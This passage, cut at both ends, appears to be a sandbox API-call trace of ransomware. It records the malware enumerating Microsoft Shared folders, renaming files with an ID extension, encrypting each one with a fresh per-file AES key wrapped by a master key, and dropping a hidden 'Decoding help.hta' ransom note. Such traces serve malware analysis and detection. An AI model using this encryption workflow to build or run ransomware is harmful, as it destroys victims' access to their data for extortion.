returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg" [0053.190] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0053.190] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\white_chocolate.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\white_chocolate.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.196] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5524bf0, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5524bf0, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x457faa5f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3ad7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wrinkled_Paper.gif", cAlternateFileName="")) returned 1 [0053.196] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0053.196] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0053.196] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0053.196] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0053.196] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Wrinkled_Paper.gif") returned -1 [0053.197] lstrlenW (lpString="Wrinkled_Paper.gif") returned 18 [0053.197] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0053.197] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0053.197] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Wrinkled_Paper.gif" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Wrinkled_Paper.gif") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Wrinkled_Paper.gif" [0053.197] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Wrinkled_Paper.gif" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Wrinkled_Paper.gif") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Wrinkled_Paper.gif" [0053.197] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Wrinkled_Paper.gif", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Wrinkled_Paper.gif.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Wrinkled_Paper.gif.[ID]g9uZrLhJaygpwRm1[ID]" [0053.197] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Wrinkled_Paper.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\wrinkled_paper.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Wrinkled_Paper.gif.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\wrinkled_paper.gif.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.197] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5524bf0, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5524bf0, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x457faa5f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3ad7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wrinkled_Paper.gif", cAlternateFileName="")) returned 0 [0053.197] FindClose (in: hFindFile=0x5da7f8 | out: hFindFile=0x5da7f8) returned 1 Thread: id = 388 os_tid = 0xad4 [0043.865] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*", lpFindFileData=0x18d1fd30 | out: lpFindFileData=0x18d1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xcf4f23c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xcf4f23c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da6f8 [0044.319] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.319] FindNextFileW (in: hFindFile=0x5da6f8, lpFindFileData=0x18d1fd30 | out: lpFindFileData=0x18d1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xcf4f23c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xcf4f23c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.319] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.319] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.319] FindNextFileW (in: hFindFile=0x5da6f8, lpFindFileData=0x18d1fd30 | out: lpFindFileData=0x18d1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0044.319] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0044.320] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0044.320] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0044.320] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*" [0044.320] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*") returned 63 [0044.320] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US" [0044.320] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\*.*" [0044.320] GlobalMemoryStatus (in: lpBuffer=0x18d1fd10 | out: lpBuffer=0x18d1fd10) [0044.320] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10a32ba8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x704 [0044.342] CloseHandle (hObject=0x704) returned 1 [0044.342] FindNextFileW (in: hFindFile=0x5da6f8, lpFindFileData=0x18d1fd30 | out: lpFindFileData=0x18d1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e16af00, ftCreationTime.dwHighDateTime=0x1cbae03, ftLastAccessTime.dwLowDateTime=0xcf518520, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3e16af00, ftLastWriteTime.dwHighDateTime=0x1cbae03, nFileSizeHigh=0x0, nFileSizeLow=0x23d78, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSCONV97.DLL", cAlternateFileName="")) returned 1 [0044.342] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*" [0044.342] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*") returned 63 [0044.342] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Decoding help.hta" [0044.342] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\decoding help.hta")) returned 0xffffffff [0044.342] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x774 [0044.425] WriteFile (in: hFile=0x774, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x18d1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x18d1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0044.426] CloseHandle (hObject=0x774) returned 1 [0044.426] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0044.426] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSCONV97.DLL") returned -1 [0044.426] lstrlenW (lpString="MSCONV97.DLL") returned 12 [0044.426] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*" [0044.426] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*") returned 63 [0044.426] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\", lpString2="MSCONV97.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" [0044.426] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" [0044.426] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0044.426] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0044.428] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x774 [0044.428] CreateFileMappingA (hFile=0x774, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x728 [0044.428] CryptAcquireContextA (in: phProv=0x18d1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18d1fcec*=0x3448cf8) returned 1 [0044.429] CryptGenKey (in: hProv=0x3448cf8, Algid=0x6610, dwFlags=0x1, phKey=0x18d1fce8 | out: phKey=0x18d1fce8*=0x5e2fb0) returned 1 [0044.429] CryptExportKey (in: hKey=0x5e2fb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x18d1fbe4, pdwDataLen=0x18d1fce4 | out: pbData=0x18d1fbe4*, pdwDataLen=0x18d1fce4*=0x2c) returned 1 [0044.429] MapViewOfFile (hFileMappingObject=0x728, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x23d60) returned 0x44f0000 [0044.449] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x18d1fbe4*, pdwDataLen=0x18d1fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x18d1fbe4*, pdwDataLen=0x18d1fcf8*=0x100) returned 1 [0044.449] CryptEncrypt (in: hKey=0x5e2fb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x44f0000, pdwDataLen=0x18d1fce4*=0x23d60, dwBufLen=0x23d60 | out: pbData=0x44f0000*, pdwDataLen=0x18d1fce4*=0x23d60) returned 1 [0044.785] UnmapViewOfFile (lpBaseAddress=0x44f0000) returned 1 [0044.788] CloseHandle (hObject=0x728) returned 1 [0044.788] CryptDestroyKey (hKey=0x5e2fb0) returned 1 [0044.788] CryptReleaseContext (hProv=0x3448cf8, dwFlags=0x0) returned 1 [0044.788] SetFilePointerEx (in: hFile=0x774, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.788] WriteFile (in: hFile=0x774, lpBuffer=0x18d1fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x18d1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x18d1fbe4*, lpNumberOfBytesWritten=0x18d1fcf8*=0x100, lpOverlapped=0x0) returned 1 [0044.789] WriteFile (in: hFile=0x774, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x18d1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x18d1fcf8*=0x500, lpOverlapped=0x0) returned 1 [0044.789] CloseHandle (hObject=0x774) returned 1 [0044.791] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0044.791] FindNextFileW (in: hFindFile=0x5da6f8, lpFindFileData=0x18d1fd30 | out: lpFindFileData=0x18d1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1aeaee00, ftCreationTime.dwHighDateTime=0x1ca9122, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1aeaee00, ftLastWriteTime.dwHighDateTime=0x1ca9122, nFileSizeHigh=0x0, nFileSizeLow=0x8f68, dwReserved0=0x0, dwReserved1=0x0, cFileName="RECOVR32.CNV", cAlternateFileName="")) returned 1 [0044.791] lstrcpyW (in: lpString1=0x5fb50f8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*" [0044.791] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*") returned 63 [0044.791] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Decoding help.hta" [0044.791] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\decoding help.hta")) returned 0x1 [0044.792] lstrcmpiW (lpString1="Decoding help.hta", lpString2="RECOVR32.CNV") returned -1 [0044.792] lstrlenW (lpString="RECOVR32.CNV") returned 12 [0044.792] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*" [0044.792] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*") returned 63 [0044.792] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\", lpString2="RECOVR32.CNV" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV" [0044.792] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV" [0044.792] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV.[ID]g9uZrLhJaygpwRm1[ID]" [0044.792] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\recovr32.cnv"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\recovr32.cnv.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0044.813] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\recovr32.cnv.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0044.813] CreateFileMappingA (hFile=0x3b0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3d8 [0044.813] CryptAcquireContextA (in: phProv=0x18d1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18d1fcec*=0x3448b60) returned 1 [0044.814] CryptGenKey (in: hProv=0x3448b60, Algid=0x6610, dwFlags=0x1, phKey=0x18d1fce8 | out: phKey=0x18d1fce8*=0x5e2ff0) returned 1 [0044.814] CryptExportKey (in: hKey=0x5e2ff0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x18d1fbe4, pdwDataLen=0x18d1fce4 | out: pbData=0x18d1fbe4*, pdwDataLen=0x18d1fce4*=0x2c) returned 1 [0044.814] MapViewOfFile (hFileMappingObject=0x3d8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8f60) returned 0x4510000 [0044.825] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x18d1fbe4*, pdwDataLen=0x18d1fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x18d1fbe4*, pdwDataLen=0x18d1fcf8*=0x100) returned 1 [0044.825] CryptEncrypt (in: hKey=0x5e2ff0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4510000, pdwDataLen=0x18d1fce4*=0x8f60, dwBufLen=0x8f60 | out: pbData=0x4510000*, pdwDataLen=0x18d1fce4*=0x8f60) returned 1 [0044.846] UnmapViewOfFile (lpBaseAddress=0x4510000) returned 1 [0044.848] CloseHandle (hObject=0x3d8) returned 1 [0044.848] CryptDestroyKey (hKey=0x5e2ff0) returned 1 [0044.848] CryptReleaseContext (hProv=0x3448b60, dwFlags=0x0) returned 1 [0044.848] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.848] WriteFile (in: hFile=0x3b0, lpBuffer=0x18d1fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x18d1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x18d1fbe4*, lpNumberOfBytesWritten=0x18d1fcf8*=0x100, lpOverlapped=0x0) returned 1 [0044.849] WriteFile (in: hFile=0x3b0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x18d1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x18d1fcf8*=0x500, lpOverlapped=0x0) returned 1 [0044.849] CloseHandle (hObject=0x3b0) returned 1 [0044.850] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0044.850] FindNextFileW (in: hFindFile=0x5da6f8, lpFindFileData=0x18d1fd30 | out: lpFindFileData=0x18d1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f938f00, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x7090d6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2f938f00, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0xdfa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wks9Pxy.cnv", cAlternateFileName="")) returned 1 [0044.851] lstrcpyW (in: lpString1=0x5fb50f8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*" [0044.851] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*") returned 63 [0044.851] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Decoding help.hta" [0044.851] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\decoding help.hta")) returned 0x1 [0044.851] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Wks9Pxy.cnv") returned -1 [0044.851] lstrlenW (lpString="Wks9Pxy.cnv") returned 11 [0044.851] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*" [0044.851] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*") returned 63 [0044.851] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\", lpString2="Wks9Pxy.cnv" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv" [0044.851] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv" [0044.851] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 